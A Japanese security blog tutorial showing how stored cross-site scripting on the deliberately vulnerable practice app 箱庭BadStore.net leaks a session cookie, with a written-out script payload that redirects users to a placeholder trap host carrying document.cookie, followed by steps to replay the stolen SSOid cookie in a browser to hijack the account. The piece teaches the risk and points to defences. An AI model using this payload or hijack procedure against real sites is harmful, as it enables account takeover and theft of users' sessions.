Webセキュリティの小部屋

はじめに

先日は、SQLインジェクションの具体例を見てその怖さを知っていただいたと思いますが、今回はクロスサイトスクリプティング（XSS）の脆弱性がある場合に、アカウト（セッション）が簡単に乗っ取られることを例示します。

先日の記事は以下を参照してください。

Webセキュリティの小部屋

SQLインジェクションの具体例を知って怖さを実感しよう

https://www.websec-room.com/2020/08/19/3601

はじめにSQLインジェクションという脆弱性は危険だとよく言われますが、具体的にどのような怖さがあるのかは具体例を見ないと実感できないと思います。この記事では、「箱庭BadStore.net」という脆弱性が組み込まれたWebアプリケーションに対して、実際にSQLインジェクションの脆弱性を攻撃し、アカウント情報を漏洩させ管理者としてログインする例をご紹介します。箱庭BadStore.netについては、以下の記事をを参照してください。SQLインジェクションとはSQLインジェクションの具体例を見る前に、SQLインジェクションとはなにか簡単に...

箱庭BadStore.net

先日に引き続き、サンプルとなるWebアプリケーションは、「箱庭BadStore.net」を使用します。

箱庭BadStore.netは、脆弱性をあらかじめ作り込んである、脆弱性診断練習用のWebアプリケーションになります。

箱庭BadStore.netの詳細については、以下の記事を参照してください。

Webセキュリティの小部屋

脆弱性診断練習の定番「BadStore.net」がBurp Suiteの拡張として帰ってきた

https://www.websec-room.com/2018/08/10/3057

脆弱性診断練習用の Web アプリケーションとして有名だった「BadStore.net」がメンテナンス終了になっているということを知り非常に残念に思っていたのですが、Twitter で @msakamoto_sf さんから、Burp Suite の拡張機能として再開発がされているとのことを教えていただきました。その名も「箱庭BadStore」です。GitHub にて GPL v2 ライセンスで Burp Suite の拡張機能として公開されています。なんでも、本家 BadStore.net が Perl で書かれていたものを、Burp Suite の拡張機能にするために Java で全面書き換えを行っているとのこ...

事前準備

事前準備として、箱庭BadStore.netにアカウントの登録を行います。

Full Nameに「testuser」、Email Addressに「test@example.com」、Passwordに「test」と入力し、「Register」からユーザーを新規登録します。

すると、ログインユーザーの情報が、「Unregistered User」から「testuser」になり、ログインできていることが分かります。

↓

クロスサイトスクリプティング（XSS)の攻撃

今回は、箱庭BadStore.netの掲示板機能にJavaScript を仕込んで、罠サイト(trap.example.com)にセッションIDを含むCookieの情報を渡します。

罠サイトでは、Cookieの情報が送信されたらメールなりで攻撃者に情報が渡るものとします。

では、掲示板に以下の書き込みをしてみます。

注目するのは、Comments 欄の以下の記述です。

"><script>window.location='http://trap.example.com/trap.php?'+document.cookie;</script><!--

これは、掲示板表示時のコメント欄のHTML のタグを一度閉じて、<script>タグを挿入しています。そして、<!-- とすることで、コメント欄の後のHTMLをコメント化してHTMLエラーがでないようにしています。そして指定された罠サイトへ、Cookie情報をURLに付与してリダイレクトします。

これにより、掲示板を表示しようとするユーザーがいれば、その度にこの攻撃コメントが表示され、罠サイトにCookie情報を送信するようになります。

コメント入力後、しばらく時間がかかりますが、以下のようにエラーページが表示されます。これがXSSの攻撃が成功した状態です。

URLの赤枠の部分に注目してください。「SSOid」というセッションIDが罠サイトの「trap.php」に渡されていることが分かります。

実際には、罠サイトは情報が漏えいしたことを隠すため、元サイトにリダイレクトして何事もなかったようにするでしょう。

実際に表示されたURLは以下のようになります。

http://trap.example.com/trap.php?SSOid=dGVzdEBleGFtcGxlLmNvbTowOThmNmJjZDQ2MjFkMzczY2FkZTRlODMyNjI3YjRmNjp0ZXN0dXNlcjpV

ユーザーアカウント（セッション）を乗っ取る

Cookieの情報を使用すれば、簡単にユーザーアカウント（セッション）を乗っ取ることができます。

先ほどのブラウザはそのままにしておいて、セッション情報が重ならないようにブラウザをシークレットモードで起動します。

注目するのは、ユーザーは「Unregistered User」となっており、ログインしていないという状況です。

このブラウザは Google Chrome ですが、ページで右クリックして、検証 > Application > Cookies へアクセスすると、現在のサイトのCookie情報を確認することができます。

ここに、先ほどの「SSOid」を Name と Value に設定します。

ここで、ページを再読み込みしてみましょう。

すると、なんということでしょう！？

「testuser」でログインが成功しているじゃないですか！！

まとめ

今回のこのアカウントの乗っ取りは、クロスサイトスクリプティング（XSS）の脆弱性で漏えいしたCookieに含まれるセッションIDを使用した、「セッションハイジャック」という攻撃になります。

セッションIDが漏えいしてしまうと、ブラウザの標準機能だけでセッションハイジャックの攻撃が成功してしまいます。

そのため、セッションIDはWebアプリケーションでは厳重に守る必要があります。

セッションIDへの攻撃は、「セッションIDの固定化」攻撃などもあります。

セッションIDをどのように守ればよいかは、下記記事を参考にしてください。

Webセキュリティの小部屋

セッション管理の不備と対策

https://www.websec-room.com/2013/03/09/497

セッション管理をセッション ID と Cookie で行なっている Webアプリケーションでは、適切な対策を行なっていないと、セッション管理の不備で深刻な脆弱性が発生します。■セッションハイジャックセッションハイジャックは、利用者が Webアプリケーションにログインした際に発行されるセッション ID を、ネットワーク上で盗聴されたり、規則性から類推されることで、攻撃者が利用者になりすます攻撃です。利用者のセッションを乗っ取ってしまうので、セッションハイジャックと呼ばれます。■セッション ID の固定化(Session Fixation/セ...

おわりに

クロスサイトスクリプティング（XSS）の脆弱性があると、簡単にアカウント（セッション）の乗っ取りができてしまうことが分かったのではないかと思います。

XSS の脆弱性は、対策漏れにより作り込みやすい脆弱性であるためご注意ください。

最近は Webアプリケーションフレームワークで対応されることも多いので、XSS の脆弱性は減ってきているのだと思います。

ですが、XSS の原理を知らないと、簡単に XSS の脆弱性を作り込んでしまうので、XSS の理解は必要でしょうね。

なお、XSSの対策は下記記事を参照してください。

Webセキュリティの小部屋

クロスサイト・スクリプティング(XSS)と対策

https://www.websec-room.com/2013/03/14/550

クロスサイト・スクリプティング(XSS)とはクロスサイト・スクリプティング(以下、XSS)とは、Web ページの出力処理に不備があるときに、悪意あるスクリプトを実行されてしまう脆弱性のことです。別サイトにある罠リンクをクリックすることで、サイトをまたがって(クロスサイト)スクリプトを実行するので、クロスサイト・スクリプティングと呼ばれます。XSS は理解が難しい脆弱性なのですが、スクリプトが実行されるのはサーバー上ではありません。スクリプトは、Web ページの表示時に利用者のブラウザ上で実行されます。クロスサイト・...

カテゴリー:ブログ